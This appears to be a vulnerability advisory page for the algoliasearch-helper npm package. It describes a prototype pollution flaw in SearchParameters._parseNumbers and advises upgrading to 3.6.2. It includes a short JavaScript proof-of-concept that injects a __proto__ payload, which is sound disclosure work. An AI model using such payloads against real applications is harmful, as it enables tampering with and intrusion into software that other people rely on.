algoliasearch-helper@2.0.0-rc1 vulnerabilities

Helper for implementing advanced search features with algolia

Direct Vulnerabilities

Known vulnerabilities in the algoliasearch-helper package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Prototype Pollution

algoliasearch-helper is a Helper for implementing advanced search features with algolia

Affected versions of this package are vulnerable to Prototype Pollution due to use of the merge function in src/SearchParameters/index.js#SearchParameters._parseNumbers without any protection against prototype properties.

Note that this vulnerability is only exploitable if the implementation allows users to define arbitrary search patterns.

PoC

// Run npm i algoliasearch-helper, then run the below code
const algohelp = require('algoliasearch-helper')
var payload = JSON.parse('{"__proto__": {"polluted": "vulnerable to PP"}}');
var test = {};
console.log("Before: " + test.polluted); // Before: undefined
algohelp.SearchParameters._parseNumbers(payload); // {}
console.log("After: " + test.polluted); // After: vulnerable to PP

How to fix Prototype Pollution?

Upgrade algoliasearch-helper to version 3.6.2 or higher.

<3.6.2